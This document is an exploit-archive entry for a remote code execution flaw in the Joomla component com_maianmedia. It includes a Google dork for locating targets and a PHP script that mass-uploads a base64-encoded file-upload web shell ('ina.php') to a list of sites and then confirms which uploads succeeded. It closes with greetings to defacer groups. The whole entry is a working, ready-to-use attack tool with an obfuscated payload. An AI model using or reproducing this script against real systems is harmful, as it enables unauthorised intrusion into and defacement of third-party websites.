#######################################################
# Exploit Title: Joomla Component com_maianmedia Remote Code Execution
# Google Dork: inurl:index.php?option=com_maianmedia
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
#######################################################
#exploit
<form method= 'POST' >
<input type= 'text' name= 'name' value= 'ina.php' >
<input type= 'submit' value= 'Hajar' name= 'hajar' ><br>
<textarea name= 'situs' cols= '45' rows= '15' >http:
</form>
<?
@set_time_limit(0);
$site = explode ( "\r\n" , $_POST [ 'situs' ]);
$namafile = $_POST [ 'name' ];
$path = array ( '/administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php' );
$nama = array ( "/administrator/components/com_maianmedia/charts/tmp-upload-images/" );
$uploader = base64_decode ( "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgSW5kb25lc2lhbiBEZWZhY2VyIHwgaW5hLnBocDwvdGl0bGU+JzsNCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQmVyaGFzaWwgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR2FnYWwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=" );
$options = array ( 'http' => array ( 'method' => "POST" , 'header' => "Content-type: text/plain\r\n" , 'content' => $uploader ));
$context = stream_context_create( $options );
if ( $_POST [ 'hajar' ])
{
foreach ( $site as $situs )
{
foreach ( $path as $upload )
{
$fopen = @ fopen ( "{$situs}{$upload}?name={$namafile}" , 'r' , false, $context );
}
foreach ( $nama as $namas )
{
$url = "{$situs}{$namas}{$namafile}" ;
$check = @ file_get_contents ( $url );
if ( eregi ( "ina.php" , $check ))
{
echo "<font face='Tahoma' size='2'>[+] Exploit Sukses => {$situs}/{$namas}/{$namafile} <br />" ;
flush ();
}
}
}
}
echo "<font face='Tahoma' size='2'>[+] greetz d3b~X - Hmei7 - SultanHaikal and all Indonesian Defacer</font>" ;
?>
|